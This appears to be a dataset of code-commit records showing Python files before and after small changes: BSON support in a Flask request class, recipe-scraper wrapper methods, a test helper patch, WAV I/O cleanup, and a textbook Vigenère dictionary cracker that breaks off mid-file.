parsed JSON data.
"""
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
<commit_msg>Add support for decoding data serialized as BSON.<commit_after>
|
import json
from bson import json_util, BSON
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype == 'application/bson':
return BSON(self.data).decode()
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
|
import json
from bson import json_util
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
Add support for decoding data serialized as BSON.
import json
from bson import json_util, BSON
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype == 'application/bson':
return BSON(self.data).decode()
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
|
<commit_before>
import json
from bson import json_util
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
<commit_msg>Add support for decoding data serialized as BSON.<commit_after>
import json
from bson import json_util, BSON
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype == 'application/bson':
return BSON(self.data).decode()
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
|
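The new `application/bson` branch relies on pymongo's `bson` package, where `BSON(self.data).decode()` parses raw bytes into a dict. Below is a hedged end-to-end sketch, assuming pymongo is installed and the module above is importable as `clio.utils`; the `/echo` route is invented for the demonstration.

```python
# Exercise the BSON branch with Flask's test client (sketch, not clio's API).
from bson import BSON
from flask import Flask, request
from clio.utils import ExtRequest

app = Flask(__name__)
app.request_class = ExtRequest  # make Flask build ExtRequest objects

@app.route('/echo', methods=['POST'])
def echo():
    return repr(request.json)  # hits the application/bson branch

payload = BSON.encode({'host': 'web-1', 'load': 0.42})
with app.test_client() as client:
    resp = client.post('/echo', data=payload, content_type='application/bson')
    print(resp.data)
```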
aa359661c31df53885e19f5acb2e0171b6f87398
|
recipe_scrapers/innit.py
|
recipe_scrapers/innit.py
|
from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(cls, domain="com"):
return f"innit.{domain}"
|
from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(cls, domain="com"):
return f"innit.{domain}"
def title(self):
return self.schema.title()
def total_time(self):
return self.schema.total_time()
def yields(self):
return self.schema.yields()
def image(self):
return self.schema.image()
def ingredients(self):
return self.schema.ingredients()
def instructions(self):
return self.schema.instructions()
def ratings(self):
return self.schema.ratings()
|
Add wrapper methods for clarity.
|
Add wrapper methods for clarity.
|
Python
|
mit
|
hhursev/recipe-scraper
|
from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(cls, domain="com"):
return f"innit.{domain}"
Add wrapper methods for clarity.
|
from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(cls, domain="com"):
return f"innit.{domain}"
def title(self):
return self.schema.title()
def total_time(self):
return self.schema.total_time()
def yields(self):
return self.schema.yields()
def image(self):
return self.schema.image()
def ingredients(self):
return self.schema.ingredients()
def instructions(self):
return self.schema.instructions()
def ratings(self):
return self.schema.ratings()
|
<commit_before>from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(cls, domain="com"):
return f"innit.{domain}"
<commit_msg>Add wrapper methods for clarity.<commit_after>
|
from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(cls, domain="com"):
return f"innit.{domain}"
def title(self):
return self.schema.title()
def total_time(self):
return self.schema.total_time()
def yields(self):
return self.schema.yields()
def image(self):
return self.schema.image()
def ingredients(self):
return self.schema.ingredients()
def instructions(self):
return self.schema.instructions()
def ratings(self):
return self.schema.ratings()
|
from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(cls, domain="com"):
return f"innit.{domain}"
Add wrapper methods for clarity.from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(cls, domain="com"):
return f"innit.{domain}"
def title(self):
return self.schema.title()
def total_time(self):
return self.schema.total_time()
def yields(self):
return self.schema.yields()
def image(self):
return self.schema.image()
def ingredients(self):
return self.schema.ingredients()
def instructions(self):
return self.schema.instructions()
def ratings(self):
return self.schema.ratings()
|
<commit_before>from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(cls, domain="com"):
return f"innit.{domain}"
<commit_msg>Add wrapper methods for clarity.<commit_after>from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(cls, domain="com"):
return f"innit.{domain}"
def title(self):
return self.schema.title()
def total_time(self):
return self.schema.total_time()
def yields(self):
return self.schema.yields()
def image(self):
return self.schema.image()
def ingredients(self):
return self.schema.ingredients()
def instructions(self):
return self.schema.instructions()
def ratings(self):
return self.schema.ratings()
|
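Every wrapper added in this commit simply forwards to the schema.org parser that `AbstractScraper` builds from the page's JSON-LD, which keeps the public interface uniform across scrapers. A stripped-down sketch of that delegation pattern, with an invented `FakeSchema` standing in for the real parser:

```python
# Minimal illustration of schema delegation; FakeSchema is made up here.
class FakeSchema:
    def title(self):
        return "Lemon Pasta"

class MiniScraper:
    def __init__(self, schema):
        self.schema = schema  # normally parsed from the page's JSON-LD

    def title(self):
        # Wrapper method: delegate to the schema parser, as Innit does.
        return self.schema.title()

print(MiniScraper(FakeSchema()).title())  # Lemon Pasta
```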
d06ff3fede08430146a03efb7964363fa950b1c9
|
pyon/util/int_test.py
|
pyon/util/int_test.py
|
#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
|
#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
from mock import patch
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
def _turn_on_queue_auto_delete(self):
patcher = patch('pyon.net.channel.RecvChannel._queue_auto_delete', True)
patcher.start()
self.addCleanup(patcher.stop)
|
Add option to turn on queue auto delete
|
Add option to turn on queue auto delete
|
Python
|
bsd-2-clause
|
mkl-/scioncc,crchemist/scioncc,scionrep/scioncc,mkl-/scioncc,scionrep/scioncc,crchemist/scioncc,scionrep/scioncc,mkl-/scioncc,crchemist/scioncc,ooici/pyon,ooici/pyon
|
#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
Add option to turn on queue auto delete
|
#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
from mock import patch
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
def _turn_on_queue_auto_delete(self):
patcher = patch('pyon.net.channel.RecvChannel._queue_auto_delete', True)
patcher.start()
self.addCleanup(patcher.stop)
|
<commit_before>#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
<commit_msg>Add option to turn on queue auto delete<commit_after>
|
#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
from mock import patch
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
def _turn_on_queue_auto_delete(self):
patcher = patch('pyon.net.channel.RecvChannel._queue_auto_delete', True)
patcher.start()
self.addCleanup(patcher.stop)
|
#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
Add option to turn on queue auto delete#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
from mock import patch
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
def _turn_on_queue_auto_delete(self):
patcher = patch('pyon.net.channel.RecvChannel._queue_auto_delete', True)
patcher.start()
self.addCleanup(patcher.stop)
|
<commit_before>#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
<commit_msg>Add option to turn on queue auto delete<commit_after>#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
from mock import patch
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
def _turn_on_queue_auto_delete(self):
patcher = patch('pyon.net.channel.RecvChannel._queue_auto_delete', True)
patcher.start()
self.addCleanup(patcher.stop)
|
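`_turn_on_queue_auto_delete` pairs `mock.patch` with `addCleanup` so the patch is reverted even when a test fails or errors, which a plain `patcher.stop()` at the end of the test body would not guarantee. The same idiom, shown self-contained with a dummy class instead of pyon's `RecvChannel`:

```python
# Stand-alone demo of the patch/addCleanup idiom (dummy target, not pyon).
import unittest
from unittest.mock import patch

class Channel:
    _queue_auto_delete = False

class DemoTest(unittest.TestCase):
    def test_auto_delete_flag(self):
        patcher = patch.object(Channel, '_queue_auto_delete', True)
        patcher.start()
        self.addCleanup(patcher.stop)  # runs even if the test fails
        self.assertTrue(Channel._queue_auto_delete)

if __name__ == '__main__':
    unittest.main()
```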
af42088008ec2592885005e1a6e2b0ae52fd15a8
|
File.py
|
File.py
|
import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
x = x.astype('float')
x = x / maxv
return (fs,x)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
x /= numpy.max(numpy.abs(x),axis=0);
x *= maxv;
x = x.astype('int16')
wav.write(filename, fs, x)
|
import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
return (fs,x.astype('float') / maxv)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
wav.write(filename, fs, (x * maxv).astype('int16'))
|
Test for WAV write and read equality
|
Test for WAV write and read equality
|
Python
|
mit
|
antiface/dspy,nils-werner/dspy
|
import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
x = x.astype('float')
x = x / maxv
return (fs,x)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
x /= numpy.max(numpy.abs(x),axis=0);
x *= maxv;
x = x.astype('int16')
wav.write(filename, fs, x)Test for WAV write and read equality
|
import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
return (fs,x.astype('float') / maxv)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
wav.write(filename, fs, (x * maxv).astype('int16'))
|
<commit_before>import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
x = x.astype('float')
x = x / maxv
return (fs,x)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
x /= numpy.max(numpy.abs(x),axis=0);
x *= maxv;
x = x.astype('int16')
wav.write(filename, fs, x)<commit_msg>Test fuer WAV write und read gleichheit<commit_after>
|
import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
return (fs,x.astype('float') / maxv)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
wav.write(filename, fs, (x * maxv).astype('int16'))
|
import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
x = x.astype('float')
x = x / maxv
return (fs,x)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
x /= numpy.max(numpy.abs(x),axis=0);
x *= maxv;
x = x.astype('int16')
wav.write(filename, fs, x)Test for WAV write and read equalityimport scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
return (fs,x.astype('float') / maxv)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
wav.write(filename, fs, (x * maxv).astype('int16'))
|
<commit_before>import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
x = x.astype('float')
x = x / maxv
return (fs,x)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
x /= numpy.max(numpy.abs(x),axis=0);
x *= maxv;
x = x.astype('int16')
wav.write(filename, fs, x)<commit_msg>Test fuer WAV write und read gleichheit<commit_after>import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
return (fs,x.astype('float') / maxv)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
wav.write(filename, fs, (x * maxv).astype('int16'))
|
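One way to check the commit message's stated goal, WAV write/read equality: write a tone, read it back, and allow roughly one least-significant bit of int16 quantization error. This sketch assumes the module above is importable as `File`; the two-LSB tolerance is a deliberate safety margin over pure truncation error.

```python
# Round-trip sanity check for wavwrite/wavread (sketch).
import numpy
from File import wavread, wavwrite

fs = 44100
t = numpy.linspace(0, 1, fs, endpoint=False)
x = 0.5 * numpy.sin(2 * numpy.pi * 440.0 * t)  # 440 Hz tone at half scale

wavwrite('tone.wav', fs, x)
fs2, y = wavread('tone.wav')
assert fs2 == fs
# astype('int16') truncates, so each sample may be off by < 1 LSB.
assert numpy.max(numpy.abs(x - y)) < 2.0 / numpy.iinfo(numpy.int16).max
```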
93d066f464a048881010a9d468a727a48e78c69d
|
books/CrackingCodesWithPython/Chapter20/vigenereDictionaryHacker.py
|
books/CrackingCodesWithPython/Chapter20/vigenereDictionaryHacker.py
|
# Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open('dictionary.txt')
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
|
# Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
DICTIONARY_FILE = "/home/jose/PycharmProjects/python-tutorials/books/CrackingCodesWithPython/Chapter11/dictionary.txt"
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open(DICTIONARY_FILE)
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
|
Update vigenereDictionaryHacker: added full path to dictionary file
|
Update vigenereDictionaryHacker: added full path to dictionary file
|
Python
|
mit
|
JoseALermaIII/python-tutorials,JoseALermaIII/python-tutorials
|
# Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open('dictionary.txt')
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
Update vigenereDictionaryHacker: added full path to dictionary file
|
# Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
DICTIONARY_FILE = "/home/jose/PycharmProjects/python-tutorials/books/CrackingCodesWithPython/Chapter11/dictionary.txt"
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open(DICTIONARY_FILE)
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
|
<commit_before># Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open('dictionary.txt')
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
<commit_msg>Update vigenereDictionaryHacker: added full path to dictionary file<commit_after>
|
# Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
DICTIONARY_FILE = "/home/jose/PycharmProjects/python-tutorials/books/CrackingCodesWithPython/Chapter11/dictionary.txt"
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open(DICTIONARY_FILE)
words = fo.readlines()
fo.close()
for word in words:
